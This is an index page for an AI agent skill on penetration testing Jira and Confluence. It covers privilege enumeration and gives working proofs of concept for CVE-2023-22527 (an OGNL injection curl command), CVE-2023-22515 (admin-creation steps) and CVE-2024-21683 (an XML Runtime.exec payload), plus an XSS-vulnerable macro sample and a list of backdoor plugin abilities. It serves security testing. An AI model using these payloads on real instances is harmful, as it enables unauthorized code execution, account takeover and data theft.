OpenSkillIndex← back to search

Hacktricks-skills jira-confluence-pentest

Security assessment and penetration testing for Jira and Confluence instances. Use this skill whenever the user needs to enumerate Jira/Confluence privileges, test for known vulnerabilities (CVE-2023-22527, CVE-2023-22515, CVE-2024-21683), assess plugin security, or perform reconnaissance on Atlassian products. Trigger on requests about Jira security, Confluence pentesting, Atlassian vulnerability scanning, privilege enumeration, or RCE testing against these platforms.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/jira/SKILL.MD
source content

Jira & Confluence Security Assessment

A skill for performing security assessments and penetration testing on Jira and Confluence instances.

Quick Start

# Check Jira privileges (authenticated or not)
./scripts/jira_privilege_check.sh https://jira.example.com

# Scan Confluence for known CVEs
./scripts/confluence_cve_scan.sh https://confluence.example.com

# Test specific RCE vulnerabilities
./scripts/confluence_rce_poc.sh https://confluence.example.com CVE-2023-22527

Jira Privilege Enumeration

Check Current User Permissions

Jira exposes permission endpoints that reveal the current user's privileges. This is useful for:

  • Identifying misconfigurations where anonymous users have elevated privileges
  • Understanding what actions an authenticated user can perform
  • Finding privilege escalation opportunities

Endpoints:

  • /rest/api/2/mypermissions
  • /rest/api/3/mypermissions

Important: Since February 1st, 2019, the 

mypermissions
endpoint requires a 
permissions
query parameter specifying which permissions to check.

Available Permissions:

ADD_COMMENTS, ADMINISTER, ADMINISTER_PROJECTS, ASSIGNABLE_USER, ASSIGN_ISSUES,
BROWSE_PROJECTS, BULK_CHANGE, CLOSE_ISSUES, CREATE_ATTACHMENTS, CREATE_ISSUES,
CREATE_PROJECT, CREATE_SHARED_OBJECTS, DELETE_ALL_ATTACHMENTS, DELETE_ALL_COMMENTS,
DELETE_ALL_WORKLOGS, DELETE_ISSUES, DELETE_OWN_ATTACHMENTS, DELETE_OWN_COMMENTS,
DELETE_OWN_WORKLOGS, EDIT_ALL_COMMENTS, EDIT_ALL_WORKLOGS, EDIT_ISSUES,
EDIT_OWN_COMMENTS, EDIT_OWN_WORKLOGS, LINK_ISSUES, MANAGE_GROUP_FILTER_SUBSCRIPTIONS,
MANAGE_SPRINTS_PERMISSION, MANAGE_WATCHERS, MODIFY_REPORTER, MOVE_ISSUES,
RESOLVE_ISSUES, SCHEDULE_ISSUES, SET_ISSUE_SECURITY, SYSTEM_ADMIN,
TRANSITION_ISSUES, USER_PICKER, VIEW_AGGREGATED_DATA, VIEW_DEV_TOOLS,
VIEW_READONLY_WORKFLOW, VIEW_VOTERS_AND_WATCHERS, WORK_ON_ISSUES

Example:

curl https://jira.example.com/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS | jq

Look for:

  • "havePermission": true
    for anonymous users (security vulnerability)
  • Unexpected privileges for authenticated users
  • ADMINISTER
    , 
    SYSTEM_ADMIN
    , or 
    ADMINISTER_PROJECTS
    permissions

Automated Enumeration Tools

Confluence Vulnerability Testing

CVE-2023-22527 – Unauthenticated Template Injection RCE

Affected Versions: Confluence Data Center/Server 8.0.x–8.5.3 & 8.4.5

Description: Vulnerable Velocity template 

text-inline.vm
allows OGNL evaluation without authentication.

Proof of Concept:

curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'

Detection: Response header 

x-cmd
will contain command output.

Scanner: Use nuclei template 

http/cves/2023/CVE-2023-22527.yaml
(nuclei-templates ≥9.7.5)

CVE-2023-22515 – Setup Reactivation Admin Creation

Affected Versions: Confluence Data Center/Server 8.0.0–8.5.1

Description: Publicly reachable instances allow flipping 

setupComplete
and re-running setup to create a new admin account.

Exploit Flow:

  1. GET /server-info.action
    – Verify reachability
  2. POST /server-info.action
    – Toggle setup flag with 
    buildNumber
    parameters
  3. POST /setup/setupadministrator.action
    – Create admin with 
    fullName
    , 
    email
    , 
    username
    , 
    password
    , 
    confirm

CVE-2024-21683 – Authenticated RCE via Code Macro

Affected Versions: Confluence with Code Macro plugin

Description: Admin can upload crafted language definition; Rhino engine executes embedded Java, leading to RCE.

Payload Template:

<?xml version="1.0"?>
<languages>
  <language key="pwn" name="pwn" namespace="java.lang">
    <tokens>
      <token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
    </tokens>
  </language>
</languages>

Trigger: Select malicious language in any Code Macro body.

Automation: Metasploit module 

exploit/multi/http/atlassian_confluence_rce_cve_2024_21683

Plugin Security Assessment

Plugin Module Types

Atlassian plugins can expose various attack surfaces:

  • REST Plugin Module: Exposes RESTful API endpoints
  • Servlet Plugin Module: Deploys Java servlets
  • Macro Plugin Module: Implements parameterized HTML templates

Common Vulnerabilities

XSS in Macros: Macro plugins often reflect user input without proper sanitization. Example vulnerable pattern:

public String execute(Map<String, String> map, String body, ConversionContext conversionContext) {
    if (map.get("Name") != null) {
        return ("<h1>Hello " + map.get("Name") + "!</h1>"); // XSS vulnerability
    }
    return "<h1>Hello World!</h1>";
}

XSS Payloads: See https://github.com/cyllective/XSS-Payloads/tree/main/Confluence

Backdoor Plugin Capabilities

Malicious plugins can perform:

  • Hide from Admins: Inject JavaScript to hide plugin from UI
  • Data Exfiltration: Access and exfiltrate attachments and pages
  • Session Token Theft: Echo headers in response, leak cookies via JavaScript
  • Command Execution: Execute arbitrary code
  • Reverse Shell: Establish reverse shell connections
  • DOM Proxying: Tunnel through browser to internal network

Reference: https://github.com/cyllective/malfluence

Assessment Workflow

  1. Reconnaissance

    • Identify Jira/Confluence version
    • Check for exposed endpoints
    • Enumerate available plugins

  2. Privilege Enumeration

    • Test anonymous access to 
      /rest/api/2/mypermissions
    • Check authenticated user permissions
    • Look for privilege escalation paths

  3. Vulnerability Scanning

    • Run CVE-2023-22527 check (unauthenticated)
    • Test CVE-2023-22515 if setup endpoint accessible
    • Check for CVE-2024-21683 if authenticated admin access

  4. Plugin Analysis

    • Review installed plugins
    • Test for XSS in macro plugins
    • Check for custom REST endpoints

  5. Exploitation

    • Use appropriate payloads based on findings
    • Document all steps for reporting

References